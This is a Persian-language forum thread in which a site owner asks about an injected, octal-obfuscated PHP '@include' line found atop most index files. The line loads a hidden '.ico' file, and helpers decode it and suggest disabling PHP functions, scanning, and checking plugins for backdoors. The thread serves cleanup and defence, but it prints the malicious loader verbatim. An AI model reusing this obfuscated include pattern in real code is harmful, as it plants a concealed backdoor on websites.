نمایش نسخه قابل چاپ
یه سایتی هست که تقریبا تمام فایل های ایندکس اون اولش یه همچین کدهایی اضافه شده .
دوستان و بزرگواران در این زمینه تجربه یا اطلاعی دارن؟کد PHP:
/*658df*/
@include "\057h\157m\145/\152e\146t\150e\165j\057p\165b\154i\143_\150t\155l\0154o\143k\163/\166e\162s\145/\056b\0718\1445\1460\060.\151c\157";
/*658df*/
انکود شده Hex
خروجی دیکد شده این کد شما :
اما اینکه چرا در همه فایلها هست، نیاز به بررسی داره که خودتون میتونید انجام بدید.کد:/home/jeftheuj/public_html
4ocks/verse/.b98d5f00.ico
این ترکیبی از کاراکترهای استاندارد و ASCII اکتال هست. که مثلا شماره 057 که داخل کد شما هست، نمایانگر اسلش / هست و 157 نمایانگر حرف O
اطلاعات در خصوص Regex تو PHP ( لینک )
سایت روی هاست اشتراکی هست یا سرور اختصاصی و مجازی و ...؟
اگر دسترسی روت دارید، یکسری از توابع PHP رو باید غیرفعال کنید.
یه اسکن هم لازم هست در کل.
اگر که سایت وردپرس هست، نیاز دارید پلاگینها رو چک کنید و ببینید پلاگین یا پوستهای بک دور داره یا نه.
نقل قول:
نوشته اصلی توسط sam_pontiac
ممنون و سپاسگزارم بابت راهنمایی تون .
بله دسترسی هاست دارم .
دقیقا چه توابعی رو باید غیرفعال کنم ؟نقل قول:
اگر دسترسی روت دارید، یکسری از توابع PHP رو باید غیرفعال کنید.
دقیقا با چی باید اسکن کنم ؟نقل قول:
یه اسکن هم لازم هست در کل.
چطور میشه این مورد رو تشخیص داد که بک دور داره یا نه ؟نقل قول:
نیاز دارید پلاگینها رو چک کنید و ببینید پلاگین یا پوستهای بک دور داره یا نه.
سلام
یه سری از سایت ها هستند که اسکن قالب و پلاگین ها رو برای ویروسی بودنشون انجام میدن.
آیا میشه به اون سایتا اعتماد کرد و این جور کد ها رو هم برسی میکنن؟